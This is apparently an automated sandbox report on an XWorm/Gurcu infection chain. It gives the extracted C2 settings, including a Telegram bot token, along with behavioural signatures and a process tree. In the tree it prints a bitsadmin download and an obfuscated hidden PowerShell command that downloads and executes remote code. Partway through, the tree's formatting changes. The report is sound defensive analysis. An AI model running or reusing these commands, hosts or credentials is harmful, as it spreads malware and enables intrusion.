Analysis
max time kernel: 1022s
max time network: 1047s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 30-08-2024 14:31
Static task: static1
URLScan task: urlscan1
General
Malware Config
Extracted
  Family: xworm
  Version: 5.0
  C2: yolomesho.work.gd:7000
  Mutex: oUFURe5xwVr67Kd5
  Attributes
    install_file: USB.exe
Extracted
  Family: gurcu
  C2: https://api.telegram.org/bot7023733342:AAF7anpSpW-b4P0f9IHAtSRpneaxwA7w_Lc/sendMessag
Signatures
Detect Xworm Payload 1 IoCs
  resource | yara_rule
  behavioral1/memory/636-291-0x0000000000400000-0x000000000040E000-memory.dmp | family_xworm
Blocklisted process makes network request 3 IoCs
  flow | pid | Process
  83 | 3600 | powershell.exe
  85 | 3600 | powershell.exe
  87 | 3600 | powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
  pid | Process
  3600 | powershell.exe
  4644 | powershell.exe
  4692 | powershell.exe
Download via BitsAdmin 1 TTPs 1 IoCs
  pid | Process
  5728 | bitsadmin.exe
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation | wscript.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation | WScript.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation | WScript.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation | WScript.exe
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
  description | ioc | Process
  File opened (read-only) | \??\E: | msedge.exe
  File opened (read-only) | \??\E: | WScript.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  flow | ioc
  3 | bitbucket.org
  6 | bitbucket.org
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  84 | api.ipify.org
  85 | api.ipify.org
Suspicious use of SetThreadContext 2 IoCs
  description | pid | Process | procid_target
  PID 4644 set thread context of 636 | 4644 | powershell.exe | 144
  PID 4692 set thread context of 5352 | 4692 | powershell.exe | 202
Command and Scripting Interpreter: JavaScript 1 TTPs
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | RegSvcs.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | RegSvcs.exe
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000003 | msedge.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\HardwareID | msedge.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Service | msedge.exe
Checks processor information in registry 2 TTPs 18 IoCs
Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | firefox.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | firefox.exe
Enumerates system info in registry 2 TTPs 9 IoCs
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Modifies data under HKEY_USERS 2 IoCs
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chrome.exe
  Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133695021353786451" | chrome.exe
Modifies registry class 2 IoCs
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings | msedge.exe
  Key created | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings | firefox.exe
NTFS ADS 1 IoCs
  description | ioc | Process
  File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 238774.crdownload:SmartScreen | msedge.exe
Suspicious behavior: EnumeratesProcesses 28 IoCs
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 64 IoCs
Suspicious use of SendNotifyMessage 64 IoCs
Suspicious use of SetWindowsHookEx 4 IoCs
  pid | Process
  5428 | firefox.exe
  5428 | firefox.exe
  5428 | firefox.exe
  5428 | firefox.exe
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bitbucket.org/xyzcrypter/lmfu/downloads/New_Document-3765618.iso1⤵
- Enumerates connected drives
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff83d7446f8,0x7ff83d744708,0x7ff83d7447182⤵PID:1780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:22⤵PID:716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:82⤵PID:3220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:12⤵PID:1988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:12⤵PID:4948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 /prefetch:82⤵PID:4184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3964 /prefetch:82⤵PID:876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:12⤵PID:1980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:12⤵PID:3524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6288 /prefetch:12⤵PID:1036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5724 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:12⤵PID:2824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:12⤵PID:1552
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3048
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2100
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "E:\New_Document-#3765618.js"1⤵
- Checks computer location settings
- Enumerates connected drives
PID:5680 -
C:\Windows\System32\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/mes/010111100110101101001111111101011011100101011110 C:\Users\Admin\AppData\Local\Temp\pmqfgkdqzsbsvsamfrryrizflqdvvwqqctmqvepuyuplixbkjbforifcqtpxeylsnfsloatiuqykwi2⤵
- Download via BitsAdmin
PID:5728
-
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\Admin\AppData\Local\Temp\pmqfgkdqzsbsvsamfrryrizflqdvvwqqctmqvepuyuplixbkjbforifcqtpxeylsnfsloatiuqykwi2⤵
- Checks computer location settings
PID:5356 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://aeroox.000webhostapp.com/mes/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3600
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:6136
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"1⤵
- Checks computer location settings
PID:4752 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "2⤵PID:5552
-
C:\Windows\system32\cmd.execmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"3⤵PID:6136
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4644 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"5⤵PID:1460
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"5⤵
- System Location Discovery: System Language Discovery
PID:636
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1892 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff83e14cc40,0x7ff83e14cc4c,0x7ff83e14cc582⤵PID:4664
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1920,i,4025198587597463577,5648890715064850329,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1900 /prefetch:22⤵PID:5204
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2224,i,4025198587597463577,5648890715064850329,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2212 /prefetch:32⤵PID:4540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2288,i,4025198587597463577,5648890715064850329,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2556 /prefetch:82⤵PID:3012
-
-
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 4232, tree depth 2]
    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,4025198587597463577,5648890715064850329,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3196 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 3148, tree depth 2]
    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3412,i,4025198587597463577,5648890715064850329,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3456 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 5032, tree depth 2]
    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4608,i,4025198587597463577,5648890715064850329,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4552 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 2424, tree depth 2]
    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4804,i,4025198587597463577,5648890715064850329,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4576 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 1248, tree depth 2]
    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4964,i,4025198587597463577,5648890715064850329,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4940 /prefetch:8
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe  [PID 6012, tree depth 1]
  Command line: "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Windows\system32\svchost.exe  [PID 2344, tree depth 1]
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Mozilla Firefox\firefox.exe  [PID 2484, tree depth 1]
  Command line: "C:\Program Files\Mozilla Firefox\firefox.exe"
  C:\Program Files\Mozilla Firefox\firefox.exe  [PID 5428, tree depth 2]
    Command line: "C:\Program Files\Mozilla Firefox\firefox.exe"
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    C:\Program Files\Mozilla Firefox\firefox.exe  [PID 5984, tree depth 3]
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1908 -prefsLen 23602 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {020b4a02-d107-4de4-96ab-24b271fcfb02} 5428 "\\.\pipe\gecko-crash-server-pipe.5428" gpu
    C:\Program Files\Mozilla Firefox\firefox.exe  [PID 5308, tree depth 3]
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2380 -parentBuildID 20240401114208 -prefsHandle 2364 -prefMapHandle 2360 -prefsLen 23638 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {704c964b-e328-4682-a3c2-f5f2d9b3d502} 5428 "\\.\pipe\gecko-crash-server-pipe.5428" socket
      - Checks processor information in registry
    C:\Program Files\Mozilla Firefox\firefox.exe  [PID 3160, tree depth 3]
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3184 -childID 1 -isForBrowser -prefsHandle 3088 -prefMapHandle 3180 -prefsLen 23779 -prefMapSize 244628 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {50d33603-97af-4f1c-b8a3-6c8889e8d64e} 5428 "\\.\pipe\gecko-crash-server-pipe.5428" tab
    C:\Program Files\Mozilla Firefox\firefox.exe  [PID 1464, tree depth 3]
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=856 -childID 2 -isForBrowser -prefsHandle 3648 -prefMapHandle 3772 -prefsLen 29012 -prefMapSize 244628 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1fd67030-334c-49fc-bddd-9e97e6274b4f} 5428 "\\.\pipe\gecko-crash-server-pipe.5428" tab
    C:\Program Files\Mozilla Firefox\firefox.exe  [PID 3144, tree depth 3]
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4812 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4840 -prefMapHandle 4836 -prefsLen 29012 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3047bdf6-f6bd-4bac-b58b-10d5fac8fcb4} 5428 "\\.\pipe\gecko-crash-server-pipe.5428" utility
      - Checks processor information in registry
    C:\Program Files\Mozilla Firefox\firefox.exe  [PID 3280, tree depth 3]
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5212 -childID 3 -isForBrowser -prefsHandle 5140 -prefMapHandle 4300 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {faad8889-c9e8-42b1-8880-dd780bab0726} 5428 "\\.\pipe\gecko-crash-server-pipe.5428" tab
    C:\Program Files\Mozilla Firefox\firefox.exe  [PID 6136, tree depth 3]
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5440 -childID 4 -isForBrowser -prefsHandle 5360 -prefMapHandle 5368 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {75e8a50e-8a24-421a-94ec-9de68f0f7c95} 5428 "\\.\pipe\gecko-crash-server-pipe.5428" tab
    C:\Program Files\Mozilla Firefox\firefox.exe  [PID 1080, tree depth 3]
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5632 -childID 5 -isForBrowser -prefsHandle 5552 -prefMapHandle 5560 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {40a01479-cde2-4ecf-8932-f3c9a0d20831} 5428 "\\.\pipe\gecko-crash-server-pipe.5428" tab
C:\Program Files\Mozilla Firefox\firefox.exe  [PID 6096, tree depth 1]
  Command line: "C:\Program Files\Mozilla Firefox\firefox.exe"
  C:\Program Files\Mozilla Firefox\firefox.exe  [PID 5300, tree depth 2]
    Command line: "C:\Program Files\Mozilla Firefox\firefox.exe"
    - Checks processor information in registry
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [PID 6136, tree depth 1]
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [PID 1388, tree depth 2]
